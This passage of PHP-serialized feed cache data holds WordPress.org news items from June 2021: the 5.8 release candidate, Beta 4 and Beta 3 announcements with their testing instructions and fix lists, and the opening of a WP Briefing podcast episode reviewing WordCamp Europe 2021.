Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2021/06/wordpress-5-8-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 30 Jun 2021 03:47:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10873\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:364:\"The first release candidate for WordPress 5.8 is now available! ? Please join us in celebrating this very important milestone in the community&#8217;s progress towards the final release of WordPress 5.8! “Release Candidate” means the new version is ready for release, but with thousands of plugins and themes and differences in how the millions of [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Jeffrey Paul\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4776:\"\n<p>The first release candidate for <a href=\"https://make.wordpress.org/core/5-8/\">WordPress 5.8</a> is now available! <img src=\"https://s.w.org/images/core/emoji/13.1.0/72x72/1f389.png\" alt=\"?\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></p>\n\n\n\n<p>Please join us in celebrating this very important milestone in the community&#8217;s progress towards the final release of WordPress 5.8!</p>\n\n\n\n<p>“Release Candidate” means the new version is ready for release, but with thousands of plugins and themes and differences in how the millions of people use WordPress, it is possible something was missed.  WordPress 5.8 is slated for release&nbsp;on&nbsp;<strong>July 20, 2021</strong>, but <em>your</em>&nbsp;help is needed to get there—if you have not tried 5.8 yet,&nbsp;<strong>now is the time</strong>!</p>\n\n\n\n<p>You can test the WordPress 5.8 release candidate in three ways:</p>\n\n\n\n<ul><li>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester plugin</a> (select the <code>Bleeding edge</code> channel and then <code>Beta/RC Only</code> stream)</li><li>Directly download the release candidate version <a href=\"https://wordpress.org/wordpress-5.8-RC1.zip\">(zip)</a></li><li>Using WP-CLI to test: <code>wp core update --version=5.8-RC1</code></li></ul>\n\n\n\n<p>Thank you to all of the contributors who tested the&nbsp;Beta releases and gave feedback.  Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>What is in WordPress 5.8?</h2>\n\n\n\n<p>The second release of 2021 continues to progress on the block editor towards the promised future of full site editing with these updates:</p>\n\n\n\n<ul><li>Manage Widgets with Blocks</li><li>Display Posts with New Blocks and Patterns</li><li>Edit Post Templates</li><li>Overview of the Page Structure</li><li>Suggested Patterns for Blocks</li><li>Style and Colorize Images</li><li><code>theme.json</code></li><li>Dropping support for IE11</li><li>Adding support for WebP</li><li>Adding Additional Block Supports</li><li><a href=\"https://make.wordpress.org/core/2021/05/27/whats-new-in-gutenberg-10-7-26-may/\">Version 10.7</a> of the Gutenberg plugin</li></ul>\n\n\n\n<p>WordPress 5.8 also has lots of refinements to enhance the developer experience.  To learn more, subscribe to the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> and pay special attention to the <a href=\"https://make.wordpress.org/core/tag/5-8+dev-notes/\">developer notes tag</a> for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.8 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the <code>readme</code> file to 5.8.  If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>,&nbsp;so those can be figured out before the final release.</p>\n\n\n\n<p>The WordPress 5.8 Field Guide, due to be published very shortly, will give you a deeper dive into the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English? &nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a>&nbsp; This release also marks the&nbsp;<a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a>&nbsp;point of the 5.8 release schedule.</p>\n\n\n\n<p><em><strong>If you think you have found a bug</strong>, you can post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a>&nbsp;in the support forums. We would love to hear from you!  If you are comfortable writing a reproducible bug report,&nbsp;<a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>, where you can also find&nbsp;<a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\n\n\n\n<p class=\"has-text-align-right\"><strong><em>Props to <a href=\'https://profiles.wordpress.org/audrasjb/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>audrasjb</a>, <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>, <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>, and <a href=\'https://profiles.wordpress.org/pbiron/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>pbiron</a> for copy suggestions and final review.</em></strong></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<p><em>We are almost there,<br>WordPress 5.8 comes next month.<br>We need your help: test!</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10873\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 5.8 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 25 Jun 2021 17:14:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10855\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:331:\"WordPress 5.8 Beta 4 is now available for testing! This software is still in development,&#160;so it is not recommended to run this version on a production site. Consider setting up a test site to play with it. You can test the WordPress 5.8 Beta 4 in three ways: Install/activate the WordPress Beta Tester plugin (select [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Jeffrey Paul\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:4104:\"\n<p>WordPress 5.8 Beta 4 is now available for testing!</p>\n\n\n\n<p><strong>This software is still in development,</strong>&nbsp;so it is not recommended to run this version on a production site. Consider setting up a test site to play with it.</p>\n\n\n\n<p>You can test the WordPress 5.8 Beta 4 in three ways:</p>\n\n\n\n<ul><li>Install/activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the&nbsp;<code>Bleeding edge</code>&nbsp;channel and the&nbsp;<code>Beta/RC Only</code> stream).</li><li>Direct download the beta version here (<a href=\"https://wordpress.org/wordpress-5.8-beta4.zip\">zip</a>).</li><li>Using WP-CLI to test: <code>wp core update --version=5.8-beta4</code></li></ul>\n\n\n\n<p>The current target for the final release is July 20, 2021. That’s less than <strong>four weeks away</strong>, so we need your help to make sure the final release is as good as it can be.</p>\n\n\n\n<h2><strong>Some Highlights</strong></h2>\n\n\n\n<p>Since <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-3/\" data-type=\"post\">Beta 3</a>, <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=06%2F24%2F2021..06%2F26%2F2021&amp;milestone=5.8&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">18</a> bugs have been fixed. Most tickets focused on polishing existing default themes, fixing bugs in the new block Widget screen, and squashing Editor bugs collected during beta.</p>\n\n\n\n<h2><strong>How You Can Help</strong></h2>\n\n\n\n<p>Watch the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/5-8+dev-notes/\">5.8-related developer notes</a> in the coming weeks, which will break down these and other changes in greater detail.</p>\n\n\n\n<p>So far, contributors have fixed <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=..06%2F25%2F2021&amp;milestone=5.8&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">254 tickets in WordPress 5.8</a>, including <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;status=reopened&amp;changetime=..06%2F25%2F2021&amp;type=enhancement&amp;type=feature+request&amp;milestone=5.8&amp;group=component&amp;col=id&amp;col=summary&amp;col=type&amp;col=status&amp;col=milestone&amp;col=changetime&amp;col=owner&amp;col=priority&amp;col=keywords&amp;order=changetime\">91 new features and enhancements</a>, and more bug fixes are on the way.</p>\n\n\n\n<p><strong>Do some testing!</strong></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/handbook/testing/beta-testing/\">Testing for bugs</a> is a vital part of polishing the release during the beta stage and a great way to contribute. <img src=\"https://s.w.org/images/core/emoji/13.1.0/72x72/2728.png\" alt=\"✨\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></p>\n\n\n\n<p>If you think you’ve found a bug, please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta</a> area in the support forums. We would love to hear from you! If you’re comfortable writing a reproducible <a href=\"https://make.wordpress.org/core/reports/\">bug report</a>, file one on <a href=\"https://core.trac.wordpress.org/newticket\">WordPress Trac</a>. That’s also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p><em>Props to <a href=\'https://profiles.wordpress.org/desrosj/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>desrosj</a> <a href=\'https://profiles.wordpress.org/clorith/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>clorith</a> for reviews and <a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a> for final edits!</em></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<p><em>Releasing software<br>Is complex when open source<br>Yet WordPressers do</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10855\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 5.8 Beta 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 23 Jun 2021 02:36:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=10843\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:331:\"WordPress 5.8 Beta 3 is now available for testing! This software is still in development,&#160;so it is not recommended to run this version on a production site. Consider setting up a test site to play with it. You can test the WordPress 5.8 Beta 3 in three ways: Install/activate the WordPress Beta Tester plugin (select [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Josepha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5777:\"\n<p>WordPress 5.8 Beta 3 is now available for testing!</p>\n\n\n\n<p><strong>This software is still in development,</strong>&nbsp;so it is not recommended to run this version on a production site. Consider setting up a test site to play with it.</p>\n\n\n\n<p>You can test the WordPress 5.8 Beta 3 in three ways:</p>\n\n\n\n<ul><li>Install/activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the&nbsp;<code>Bleeding edge</code>&nbsp;channel and the&nbsp;<code>Beta/RC Only</code> stream).</li><li>Direct download the beta version here (<a href=\"https://wordpress.org/wordpress-5.8-beta3.zip\">zip</a>).</li><li>Using WP-CLI to test: <code>wp core update --version=5.8-beta3</code></li></ul>\n\n\n\n<p>The current target for the final release is July 20, 2021. That’s just <strong>four weeks away</strong>, so we need your help to make the final release is as good as it can be.</p>\n\n\n\n<h2><strong>Some Highlights</strong></h2>\n\n\n\n<p>Since <a href=\"https://wordpress.org/news/2021/06/wordpress-5-8-beta-2/\" data-type=\"post\">Beta 2</a>, <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=06%2F16%2F2021..06%2F23%2F2021&amp;milestone=5.8&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">38</a> bugs have been fixed. Here is a summary of some of the included changes:</p>\n\n\n\n<ul><li>Block Editor: Move caching to endpoint for unique responses. (<a href=\"https://core.trac.wordpress.org/ticket/53435\">#53435</a>)</li><li>Bundled Themes: Improve display of blocks in widget areas. (<a href=\"https://core.trac.wordpress.org/ticket/53422\">#53422</a>)</li><li>Coding Standards: Bring some consistency to HTML formatting in <code>wp-admin/comment.php</code>. (<a href=\"https://core.trac.wordpress.org/ticket/52627\">#52627</a>)</li><li>Editor: Include Cover block in the list of block types registered using metadata files. (<a href=\"https://core.trac.wordpress.org/ticket/53440\">#53440</a>)</li><li>Editor: Include Cover block in the list of block types registered using metadata files. (<a href=\"https://core.trac.wordpress.org/ticket/53440\">#53440</a>)</li><li>Media: Add new functions to return the previous/next attachment links. (<a href=\"https://core.trac.wordpress.org/ticket/45708\">#45708</a>)</li><li>Media: Improve upload page media item layout on smaller screens. (<a href=\"https://core.trac.wordpress.org/ticket/51754\">#51754</a>)</li><li>Media: Update total attachment count when media added or removed. (<a href=\"https://core.trac.wordpress.org/ticket/53171\">#53171</a>)</li><li>REST API: Decode single and double quote entities in widget names and descriptions. (<a href=\"https://core.trac.wordpress.org/ticket/53407\">#53407</a>)</li><li>Twenty Nineteen: Update margins on full- and wide-aligned blocks in the editor. (<a href=\"https://core.trac.wordpress.org/ticket/53428\">#53428</a>)</li><li>Widgets: Add editor styles to the widgets block editor. (<a href=\"https://core.trac.wordpress.org/ticket/53344\">#53344</a>)</li></ul>\n\n\n\n<h2><strong>How You Can Help</strong></h2>\n\n\n\n<p>Watch the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/5-8+dev-notes/\">5.8-related developer notes</a> in the coming weeks, which will break down these and other changes in greater detail.</p>\n\n\n\n<p>So far, contributors have fixed <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=..06%2F23%2F2021&amp;milestone=5.8&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">254 tickets in WordPress 5.8</a>, including <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;status=reopened&amp;changetime=..06%2F23%2F2021&amp;type=enhancement&amp;type=feature+request&amp;milestone=5.8&amp;group=component&amp;col=id&amp;col=summary&amp;col=type&amp;col=status&amp;col=milestone&amp;col=changetime&amp;col=owner&amp;col=priority&amp;col=keywords&amp;order=changetime\">91 new features and enhancements</a>, and more bug fixes are on the way.</p>\n\n\n\n<p><strong>Do some testing!</strong></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/handbook/testing/beta-testing/\">Testing for bugs</a> is a vital part of polishing the release during the beta stage and a great way to contribute. <img src=\"https://s.w.org/images/core/emoji/13.1.0/72x72/2728.png\" alt=\"✨\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /></p>\n\n\n\n<p>If you think you’ve found a bug, please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta</a> area in the support forums. We would love to hear from you! If you’re comfortable writing a reproducible <a href=\"https://make.wordpress.org/core/reports/\">bug report</a>, file one on <a href=\"https://core.trac.wordpress.org/newticket\">WordPress Trac</a>. That’s also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p><em>Props to <a href=\'https://profiles.wordpress.org/jeffpaul/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jeffpaul</a> <a href=\'https://profiles.wordpress.org/desrosj/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>desrosj</a> <a href=\'https://profiles.wordpress.org/hellofromtonya/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>hellofromtonya</a> <a href=\'https://profiles.wordpress.org/pbiron/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>pbiron</a> for reviews and final edits!</em></p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<p><em>Esperanza first.<br>Want to know the next jazzer?<br>Then please test beta.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"10843\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:58:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"WP Briefing: Episode 11: WordCamp Europe 2021 in Review\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/news/2021/06/episode-11-wordcamp-europe-2021-in-review/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 21 Jun 2021 12:33:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=10837\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:364:\"In this episode, Josepha Haden Chomphosy does a mini deep dive into WordCamp Europe 2021, specifically the conversation between the project’s co-founder, Matt Mullenweg, and Brian Krogsgard formerly of PostStatus. Tune in to hear her take and for this episode’s small list of big things. Have a question you&#8217;d like answered? You can submit them [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/06/WP-Briefing-011.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:10500:\"\n<p>In this episode, Josepha Haden Chomphosy does a mini deep dive into WordCamp Europe 2021, specifically the conversation between the project’s co-founder, Matt Mullenweg, and Brian Krogsgard formerly of PostStatus. Tune in to hear her take and for this episode’s small list of big things.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:<a href=\"https://profiles.wordpress.org/dustinhartzler/\"> Dustin Hartzler</a></p>\n\n\n\n<p>Logo:<a href=\"https://profiles.wordpress.org/beafialho/\"> Beatriz Fialho</a></p>\n\n\n\n<p>Production:<a href=\"https://profiles.wordpress.org/mkaz/\"> </a><a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></p>\n\n\n\n<p>Song: Fearless First by Kevin MacLeod</p>\n\n\n\n<h2>References </h2>\n\n\n\n<p><a href=\"https://wordpress.org/news/2021/06/gutenberg-highlights/\">Gutenberg Highlights&nbsp;</a></p>\n\n\n\n<p><a href=\"https://www.youtube.com/watch?v=o-IvKy3322k&amp;t=12428s\">Matt Mullenweg in conversation with Brian Krogsgard&nbsp;</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/5-8/\">5.8 Development Cycle</a></p>\n\n\n\n<p><a href=\"https://japan.wordcamp.org/2021/\">WordCamp Japan</a></p>\n\n\n\n<p><a href=\"https://europe.wordcamp.org/2021/a-recap-on-wceu-2021/\">A recap on WCEU 2021</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-10837\"></span>\n\n\n\n<p><strong>Josepha Haden Chomphosy 00:10</strong></p>\n\n\n\n<p>Hello, everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insights into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy. Here we go!</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy 00:40</strong></p>\n\n\n\n<p>A couple of weeks ago, we hosted WordCamp Europe and had the double pleasure of a demo that showed us a bit about the future of WordPress and an interview that looked back while also looking a bit forward. If you haven&#8217;t seen the demo, it was beautiful. And I&#8217;ve included a link to it in the show notes. And if you haven&#8217;t heard the interview, there were a few specific moments that I&#8217;d like to take the time to delve into a little more. Brian Krogsgard, in his conversation with Matt Mullenweg, brought up three really interesting points. I mean, he brought up a lot of interesting points, but there were three that I would particularly like to look into today. The first was about balance. The second was about cohesion. And the third was about those we leave behind.&nbsp;&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy 01:24</strong></p>\n\n\n\n<p>So first is this question of balance. Brian brought this up in the context of the overall economic health of the WordPress ecosystem. And in that particular moment, he talked 